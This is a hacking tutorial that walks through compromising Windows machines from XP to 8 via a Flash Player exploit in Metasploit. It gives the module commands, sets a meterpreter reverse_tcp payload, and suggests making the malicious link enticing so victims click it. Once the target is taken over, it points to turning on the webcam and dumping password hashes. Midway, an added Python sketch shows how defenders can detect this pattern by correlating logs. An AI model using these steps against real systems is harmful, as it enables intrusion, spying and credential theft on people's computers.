Hacking Windows (XP, Vista, 7, 8) Using Flash Player
In this tutorial, we will look at one way to hack Flash Player with Metasploit that works on nearly all Windows platforms, from XP up to Windows 8.
Flash Player is such a fertile ground for vulnerabilities and exploits that it is worth your time and trouble to consider developing your own zero-day exploit for this poorly designed and troubled application.
Step 1: Check for Vulnerabilities
Let's start by looking at the known vulnerabilities in Adobe Flash Player by going to my favorite vulnerability database, Symantec's SecurityFocus, at the following link.
When you open up this URL, go to Vendor and select "Adobe" from the drop-down box, followed by "Flash Player" in the Title section. Leave the Version section untouched so that it provides us with Adobe Flash Player's vulnerabilities for all versions.
As you can see, Adobe Flash Player has 9 pages of vulnerabilities, and 13 of the vulnerabilities have been revealed in just the last month. No matter how many times Adobe patches this application, the vulnerabilities never stop!
Step 2: Fire Up Kali and Start Metasploit
Now that we know that Adobe Flash Player is fertile ground for us to hack, let's fire up Kali Linux and open Metasploit.
Now, let's use the built-in search function in Metasploit to find Adobe exploits.
msf > search adobe
As you can see, Metasploit has one called:
This is a relatively new exploit, just having been released on April 28th, 2014. Let's use that one.
Step 3: Set the Options
To use this exploit, simply type:
msf > info
Note that this exploit will work on all operating systems from Windows XP to Windows 8 with Internet Explorer 6 through 11 with Flash 11, 12, and 13. That is a whole lot of vulnerable systems!
Before we start our exploit, let's check to see what options we need to set.
msf > show options
As you can see in the screenshot above, this exploit has numerous options, but all of them are already set with default values. The two you may want to change (though neither is required) are the SRVPORT (8080) and the URIPATH. Note that if you do not change the URIPATH, it will be set using your IP address and a random string. If you are looking to entice someone to click on this link, you may want to make the URI more enticing.
Step 4: Set the Payload
Now, we need to set the payload that we want to deliver to the victim system. Ideally, we always want to deliver the meterpreter, if we can. Some exploits will allow us to deliver the meterpreter and others will not. In this case, we can deliver the meterpreter, so let's go for it!
msf > set PAYLOAD windows/meterpreter/reverse_tcp
Now, set the local host IP (LHOST).
msf > set LHOST 192.168.147.129
Running this exploit is clean and simple. Just type "exploit" and it creates and starts a web server and a path to the malicious code that will exploit Adobe's Flash Player.
Step 6: Navigate to the Web Server from a Windows Machine
Now, let's go over to our Windows 7 machine and enter the URL of our malicious web server that we built in Metasploit.
While we are doing that, we can see in Metasploit that things are stirring. A connection is being established between the Windows 7 machine and our Kali system running Metasploit.
If we are patient, we will be rewarded with a meterpreter command on the Windows 7 system.
Congrats! You own that system.
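From the defender's side, the sequence in Steps 3 through 6 leaves a correlatable trace: an Internet Explorer client fetches a page from a web server addressed by bare IP on a non-standard port (8080 by default), and shortly afterwards the same client opens a second TCP connection to that same IP for the reverse_tcp payload. The detection sketch below is an added example, not part of the original tutorial; the log formats, addresses, port 4444 and the 60-second window are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events, not taken from the page. 192.0.2.x are clients;
# 198.51.100.7 stands in for a host running both the web server and the listener.
UA = '"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"'
PROXY_LOG = [
    "2014-05-02T10:15:01 192.0.2.10 GET http://198.51.100.7:8080/Xq3ZkT9a " + UA,
    "2014-05-02T10:16:40 192.0.2.11 GET http://intranet.example:8080/status " + UA,
]
FLOW_LOG = [  # time, source, destination, destination port, protocol
    "2014-05-02T10:15:01 192.0.2.10 198.51.100.7 8080 tcp",  # the page fetch itself
    "2014-05-02T10:15:09 192.0.2.10 198.51.100.7 4444 tcp",  # second connection
    "2014-05-02T10:17:00 192.0.2.11 203.0.113.5 443 tcp",
]

PROXY_RE = re.compile(
    r'^(\S+) (\S+) GET http://(\d{1,3}(?:\.\d{1,3}){3}):(\d+)/\S* "([^"]*)"$')
IE_RE = re.compile(r"MSIE |Trident/")  # Internet Explorer 6-11 user agents

def suspicious_fetches(lines):
    """Yield (time, client, server_ip, port) for IE requests to a raw IP on an odd port."""
    for line in lines:
        m = PROXY_RE.match(line)
        if not m:
            continue  # host is a DNS name, or the line is malformed
        ts, client, ip, port, ua = m.groups()
        if int(port) not in (80, 443) and IE_RE.search(ua):
            yield datetime.fromisoformat(ts), client, ip, int(port)

def correlate(proxy_lines, flow_lines, window=timedelta(seconds=60)):
    """Alert when a client fetches a page from a raw-IP web server and then opens a
    TCP connection to the same IP on a different port within `window`."""
    fetches = list(suspicious_fetches(proxy_lines))
    alerts = []
    for line in flow_lines:
        parts = line.split()
        if len(parts) != 5 or parts[4] != "tcp":
            continue
        when, src, dst, dport = datetime.fromisoformat(parts[0]), parts[1], parts[2], int(parts[3])
        for f_time, client, ip, web_port in fetches:
            delay = when - f_time
            if (src, dst) == (client, ip) and dport != web_port \
                    and timedelta(0) <= delay <= window:
                alerts.append({"client": src, "server": dst, "port": dport,
                               "delay_s": int(delay.total_seconds())})
    return alerts

if __name__ == "__main__":
    for alert in correlate(PROXY_LOG, FLOW_LOG):
        print(alert)
```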
Step 7: Meterpreter
With the meterpreter on the victim system, we now have the ability and option to run any of the meterpreter scripts that I've listed here on Null Byte for you. For instance, you can turn on the webcam with webcam.rb or grab the password hashes with hashdump.rb.
Adobe's Flash Player continues to provide us with fertile ground to hack Windows and other systems with its plethora of vulnerabilities.